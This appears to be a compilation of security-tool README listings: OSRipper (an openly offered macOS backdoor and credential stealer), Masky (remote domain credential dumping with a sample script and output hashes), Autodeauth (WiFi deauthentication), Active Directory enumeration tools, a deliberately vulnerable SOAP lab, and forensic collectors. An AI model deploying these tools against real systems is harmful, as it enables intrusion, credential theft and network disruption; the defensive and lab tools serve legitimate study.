OSRipper - AV Evading OSX Backdoor And Crypter Framework


OSRipper is a fully undetectable backdoor generator and crypter which specialises in OSX M1 malware. It will also work on Windows, but for now there is no support for it and it IS NOT FUD for Windows (yet, at least); for now I will not focus on Windows.

You can also PM me on discord for support or to ask for new features SubGlitch1#2983


Features

  • FUD (for macOS)
  • Cloaks as an official app (Microsoft, ExpressVPN etc)
  • Dumps: sys info, browser history, logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens' swiftbelt)
  • Encrypted communications
  • Rootkit-like Behaviour
  • Every Backdoor generated is entirely unique

Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper




ย macOS .apps will look like this on vt

Getting Started

Dependencies

You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.

Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Only this

sudo python3 main.py

Contributing

Please feel free to fork and open pull requests. Suggestions/criticism are appreciated as well.

Roadmap

v0.1

  • โœ…Get down detection to 0/26 on antiscan.me
  • โœ…Add Changelog
  • โœ…Daemonise Backdoor
  • โœ…Add Crypter
  • โœ…Add More Backdoor templates
  • โœ…Get down detection to at least 0/68 on VT (for mac malware)

v0.2

  • โœ…Add AntiVM
  • [] Implement tor hidden services
  • โœ…Add Logger
  • โœ…Add Password stealer
  • [] Add KeyLogger
  • โœ…Add some new evasion options
  • โœ…Add SilentMiner
  • [] Make proper C2 server

v0.3

Coming soon

Help

Just open an issue and I'll make sure to get back to you.

Changelog

  • 0.2.1

    • OSRipper will now pull all information from the target and send it to the C2 server over sockets. This includes information like browser history, passwords, system information, keys, etc.
  • 0.1.6

    • Process will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared
  • 0.1.5

    • Added Crypter
  • 0.1.4

    • Added 4th Module
  • 0.1.3

    • Got detection on VT down to 0. Made the process invisible
  • 0.1.2

    • Added 3rd module and listener
  • 0.1.1

    • Initial Release

License

MIT

Acknowledgments

Inspiration, code snippets, etc.

Support

I am very sorry to even write this here, but my finances are not looking good right now. If you appreciate my work, I would really be happy about any donation. You do NOT have to; this is solely optional.

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T

Disclaimer

I am not responsible for what is done with this project. This tool is written solely to be studied by other security researchers, to see how easy it is to develop macOS malware.



Aced - Tool to parse and resolve a single targeted Active Directory principal's DACL


Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound allowed-access privileges against the targeted account, resolve the SIDs of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally, which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.


Use case?

I wrote Aced simply because I wanted a more targeted approach to querying ACLs. BloodHound is fantastic; however, it is extremely noisy. BloodHound collects everything, while Aced collects a single thing, giving the operator more control over how and what data is collected. There's a phrase the Navy SEALs use, "slow is smooth and smooth is fast", and that's the approach I tried to take with Aced. The chance of detection is reduced by querying only for what LDAP wants to tell you and by not performing what are known as "expensive LDAP queries". Aced has the option to forego SMB connections for hostname resolution. You have the option to prefer LDAPS over LDAP. With the additional BloodHound integration, the collected data can be stored in a familiar format that can be shared with a team. Privilege escalation attack paths can be built by walking backwards from the targeted goal.

References

Thanks to the below for all the code I stole:
@_dirkjan
@fortaliceLLC
@eloygpz
@coffeegist
@tw1sm

Usage

โ””โ”€# python3 aced.py -h                             


_____
|A . | _____
| /.\ ||A ^ | _____
|(_._)|| / \ ||A _ | _____
| | || \ / || ( ) ||A_ _ |
|____V|| . ||(_'_)||( v )|
|____V|| | || \ / |
|____V|| . |
|____V|
v1.0

Parse and log a target principal's DACL.
@garrfoster

usage: aced.py [-h] [-ldaps] [-dc-ip DC_IP] [-k] [-no-pass] [-hashes LMHASH:NTHASH] [-aes hex key] [-debug] [-no-smb] target

Tool to enumerate a single target's DACL in Active Directory

optional arguments:
-h, --help show this help message and exit

Authentication:
target [[domain/username[:password]@]<address>
-ldaps Use LDAPS instead of LDAP

Optional Flags:
-dc-ip DC_IP IP address or FQDN of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-no-pass don't ask for password (useful for -k)
-hashes LMHASH:NTHASH
LM and NT hashes, format is LMHASH:NTHASH
-aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-debug Enable verbose logging.
-no-smb Do not resolve DC hostname through SMB. Requires a FQDN with -dc-ip.

Demo

In the below demo, we have the credentials for the corp.local\lowpriv account. By starting enumeration at Domain Admins, a potential path for privilege escalation is identified by walking backwards from the high value target.
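For reference, an invocation following the usage grammar above might look like this (all values here are hypothetical):

$ python3 aced.py -ldaps corp.local/lowpriv:'Passw0rd!'@192.168.1.10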


And here's how that data looks when transformed by bofhound and ingested into BloodHound.




Autodeauth - A Tool Built To Automatically Deauth Local Networks


A tool built to automatically deauth local networks

Setup

$ chmod +x setup.sh
$ sudo ./setup.sh
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Please enter your WiFi interface name e.g: wlan0 -> wlan1
autodeauth installed

use sudo autodeauth or systemctl start autodeauth

to edit service setting please edit: service file: /etc/systemd/system/autodeauth.service

Options

$ sudo autodeauth -h
_ _ ___ _ _
/_\ _ _| |_ ___| \ ___ __ _ _ _| |_| |_
/ _ \ || | _/ _ \ |) / -_) _` | || | _| ' \
/_/ \_\_,_|\__\___/___/\___\__,_|\_,_|\__|_||_|

usage: autodeauth [-h] --interface INTERFACE [--blacklist BLACKLIST] [--whitelist WHITELIST] [--led LED] [--time TIME] [--random] [--ignore] [--count COUNT] [--verbose VERBOSE]

Auto Deauth Tool

options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Interface to fetch WiFi networks and send deauth packets (must support packet injection)
--blacklist BLACKLIST, -b BLACKLIST
List of network SSIDs/MAC addresses to avoid (comma separated)
--whitelist WHITELIST, -w WHITELIST
List of network SSIDs/MAC addresses to target (comma separated)
--led LED, -l LED Led pin number for led display
--time TIME, -t TIME Time (in s) between two deauth packets (default 0)
--random, -r Randomize your MAC address before deauthing each network
--ignore Ignore errors encountered when randomizing your MAC address
--count COUNT, -c COUNT
Number of packets to send (default 5000)
--verbose VERBOSE, -v VERBOSE
Scapy verbosity setting (default: 0)

Usage

After running the setup, you are able to run the script by using autodeauth from any directory.

Command line

Networks with spaces in their names can be represented using their MAC addresses:

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,E1:DB:12:2F:C1:57 -c 10000

Service

$ sudo systemctl start autodeauth

Loot and Log files

Loot

When a network is detected that fits the whitelist/blacklist criteria, its network information is saved as a JSON file in /var/log/autodeauth/:

{
"ssid": "MyWiFiNetwork",
"mac_address": "10:0B:21:2E:C1:11",
"channel": 1,
"network.frequency": "2.412 GHz",
"mode": "Master",
"bitrates": [
"6 Mb/s",
"9 Mb/s",
"12 Mb/s",
"18 Mb/s",
"24 Mb/s",
"36 Mb/s",
"48 Mb/s",
"54 Mb/s"
],
"encryption_type": "wpa2",
"encrypted": true,
"quality": "70/70",
"signal": -35
}

Log File

$ cat /var/log/autodeauth/log               
2022-08-20 21:01:31 - Scanning for local networks
2022-08-20 21:20:29 - Sending 5000 deauth frames to network: A0:63:91:D5:B8:76 -- MyWiFiNetwork
2022-08-20 21:21:00 - Exiting/Cleaning up

Edit Service Config

To change the settings of the autodeauth service, edit the file /etc/systemd/system/autodeauth.service.
Let's say you wanted the following config to be set up as a service:

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000
$ vim /etc/systemd/system/autodeauth.service

Then you would change the ExecStart line to

ExecStart=/usr/bin/python3 /usr/local/bin/autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000


Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory


Masky is a Python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX files, NT hashes and TGTs on a larger scope.

This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via Kerberos & NT hash retrieval via PKINIT). A blog post was published detailing the implemented techniques and how Masky works.

Masky's source code is largely based on the amazing Certify and Certipy tools. I really thank their authors for their research regarding offensive exploitation techniques against ADCS (see the Acknowledgments section).


Installation

The Masky python3 library and its associated CLI can be simply installed via the public PyPI repository as follows:

pip install masky

The Masky agent executable is already included within the PyPI package.

Moreover, if you need to modify the agent, the C# code can be recompiled via the Visual Studio project located in agent/Masky.sln. It requires .NET Framework 4 to build.

Usage

Masky has been designed as a Python library. Moreover, a command line interface was created on top of it to ease its usage during pentest or RedTeam activities.

For both usages, you first need to retrieve the FQDN of a CA server and its CA name deployed via ADCS. This information can be easily retrieved via Certipy's find option or via the Microsoft built-in certutil.exe tool. Make sure that the default User template is enabled on the targeted CA.
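For example, using values taken from the demo later in this section (exact flags may vary with your Certipy version), the CA FQDN and name could be enumerated with:

$ certipy find -u 'askywalker@sec.lab' -p '<password>' -dc-ip 192.168.23.148

or, from a domain-joined Windows host, via the built-in tool (the Config line of its output contains the SERVER\CA_NAME string):

C:\> certutil.exe -dump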

Warning: Masky deploys an executable on each target via a modification of the existing RasAuto service. Despite the automated rollback of its initial ImagePath value, an unexpected error during Masky's runtime could skip the cleanup phase. Therefore, do not forget to manually reset the original value in case of such an unwanted stop.

Command line

The following demo shows a basic usage of Masky by targeting 4 remote systems. Its execution allows collecting the NT hashes, CCACHE files and PFX files of 3 distinct domain users from the sec.lab testing domain.

Masky also provides options that are commonly provided by such tools (thread number, authentication mode, targets loaded from files, etc. ).

  __  __           _
| \/ | __ _ ___| | ___ _
| |\/| |/ _` / __| |/ / | | |
| | | | (_| \__ \ <| |_| |
|_| |_|\__,_|___/_|\_\__, |
v0.0.3 |___/

usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT]
[targets ...]

positional arguments:
targets Targets in CIDR, hostname and IP formats are accepted, from a file or not

options:
-h, --help show this help message and exit
-v, --verbose Enable debugging messages
-ts, --timestamps Display timestamps for each log
-t THREADS, --threads THREADS
Threadpool size (max 15)

Authentication:
-d DOMAIN, --domain DOMAIN
Domain name to authenticate to
-u USER, --user USER Username to authenticate with
-p PASSWORD, --password PASSWORD
Password to authenticate with
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters.
-H HASHES, --hashes HASHES
Hashes to authenticate with (LM:NT, :NT or :LM)

Connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY
Certificate Authority Name (SERVER\CA_NAME)

Results:
-nh, --no-hash Do not request NT hashes
-nt, --no-ccache Do not save ccache files
-np, --no-pfx Do not save pfx files
-o OUTPUT, --output OUTPUT
Local path to a folder where Masky results will be stored (automatically creates the folder if it does not exist)

Python library

Below is a simple script using the Masky library to collect secrets of running domain user sessions from a remote target.

from masky import Masky
from getpass import getpass


def dump_nt_hashes():
    # Define the authentication parameters
    ca = "srv-01.sec.lab\\sec-SRV-01-CA"
    dc_ip = "192.168.23.148"
    domain = "sec.lab"
    user = "askywalker"
    password = getpass()

    # Create a Masky instance with these credentials
    m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

    # Set a target and run Masky against it
    target = "192.168.23.130"
    rslts = m.run(target)

    # Check if Masky successfully hijacked at least a user session
    # or if an unexpected error occurred
    if not rslts:
        return False

    # Loop on the MaskyResults object to display hijacked users and to retrieve their NT hashes
    print(f"Results from hostname: {rslts.hostname}")
    for user in rslts.users:
        print(f"\t - {user.domain}\\{user.name} - {user.nt_hash}")

    return True


if __name__ == "__main__":
    dump_nt_hashes()

Its execution generates the following output:

$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes.

Acknowledgments



Erlik - Vulnerable Soap Service


Erlik - Vulnerable Soap Service

Tested - Kali 2022.1

Description

It is a vulnerable SOAP web service. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


Features

It contains the following vulnerabilities.

  • LFI
  • SQL Injection
  • Information Disclosure
  • Command Injection
  • Brute Force
  • Deserialization

Installation

git clone https://github.com/anil-yelken/Vulnerable-Soap-Service

cd Vulnerable-Soap-Service

sudo pip3 install -r requirements.txt

Usage

sudo python3 vulnerable_soap.py
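Once the service is up, it can be probed with any SOAP client. The snippet below is only a hypothetical sketch: the listen address, namespace and method name are invented, so check vulnerable_soap.py and the exploit scripts below for the real ones.

import requests

# All values here are assumptions for illustration only
URL = "http://127.0.0.1:8000/"
ENVELOPE = """<?xml version="1.0"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:tns="vulnerable.soap.service">
  <soapenv:Body>
    <tns:get_user>
      <tns:username>admin</tns:username>
    </tns:get_user>
  </soapenv:Body>
</soapenv:Envelope>"""

resp = requests.post(URL, data=ENVELOPE,
                     headers={"Content-Type": "text/xml; charset=utf-8"})
print(resp.status_code)
print(resp.text)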

Exploiting Vulnerabilities

LFI

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/lfi.py

SQL Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/sqli.py

Information Disclosure

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_logs_information_disclosure.py

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_data_information_disclosure.py

Command Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/commandi.py

Brute Force

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/brute.py

Deserialization

Code:

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_socket.py

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_requests.py



Pict - Post-Infection Collection Toolkit


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered a full forensic data collection, but it does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without them.

Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second are complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one required parameter, which passes in a configuration script in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:
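A minimal sketch of such a configuration, assembled from the keys documented in the sections that follow (the module and class names browser, BrowserCollector and ExampleCollector are illustrative, not confirmed):

{
    "collection_dest": "~/pict-data",
    "all_users": true,
    "collectors": {
        "browser": "BrowserCollector"
    },
    "unused": {
        "example": "ExampleCollector"
    },
    "settings": {
        "keepLSData": false,
        "zipIt": true
    },
    "moduleSettings": {
        "browser": {
            "collectArtifacts": true
        }
    }
}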

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the superclass Collector.__init__() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collector class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.
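Putting the above hooks together, a custom module might look like the following sketch (the class name, output filename, artifact path and import path are illustrative; collectors/template.py is the canonical starting point):

import os
from collectors.collector import Collector

class ExampleCollector(Collector):
    def printStartInfo(self):
        # give the user a sense of progress
        print("Collecting example data...")

    def applySettings(self, settingsDict):
        # read any module-specific settings here, then pass the dict to
        # the super so the global settings (e.g. collectArtifacts) apply
        Collector.applySettings(self, settingsDict)

    def collect(self):
        # summary output belongs inside the collection folder, under a
        # filename no other module uses
        summaryPath = os.path.join(self.collectionPath, "example.txt")
        with open(summaryPath, "w") as f:
            f.write("example summary output\n")

        # queue a file artifact; the Collector class copies it into the
        # artifacts folder and maintains its metadata
        self.pathsToCollect.append("/etc/hosts")

        # let the Collector class handle its responsibilities
        Collector.collect(self)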

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd SilentHound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP password - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a lay of the land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed, it will attempt an anonymous BIND.
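For example, a credentialed run against a hypothetical domain (the IP, credentials and output basename below are invented) could look like:

$ pipenv run python silenthound.py -u 'bob dole' -p 'Passw0rd!' -o BASENAME -g -n -k 192.168.1.5 ACME.com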

Using the -o flag will result in output files for each section normally written to stdout. The files created using all flags will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r--  1 kali  kali    60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r--  1 kali  kali  2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r--  1 kali  kali    89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r--  1 kali  kali  1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r--  1 kali  kali    66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r--  1 kali  kali   529 Jun 30 11:37 BASENAME-users.txt

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTF's in order to pinpoint where escalation and attack vectors may exist.



To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).

What is modDetective Doing?

modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user-specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT the ones specified in the -i option; -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification time of each file, then orders these modification times so it can output them chronologically.
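Conceptually, the core loop is no more than the following sketch (an illustration of the approach just described, not the tool's actual code):

import os
import sys

# "dynamic" directories ignored by default, per the note above
DYNAMIC = ("/proc", "/sys", "/run", "/snap", "/dev")

def walk_mtimes(root="/", ignore=DYNAMIC):
    entries = []
    for dirpath, dirnames, filenames in os.walk(root):
        # prune ignored subtrees so os.walk never descends into them
        dirnames[:] = [d for d in dirnames
                       if not os.path.join(dirpath, d).startswith(ignore)]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                entries.append((os.path.getmtime(path), path))
            except OSError:
                pass  # vanished or unreadable files are skipped
    entries.sort()  # chronological order, oldest first
    return entries

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for mtime, path in walk_mtimes(root):
        print("%s %s" % (mtime, path))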

Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity", since recent modifications to them indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.

Requirements

modDetective currently works only with Python 3; Python 2 compatibility will be completed shortly (hence the lack of f-strings). Standard libraries should be fine.



โŒ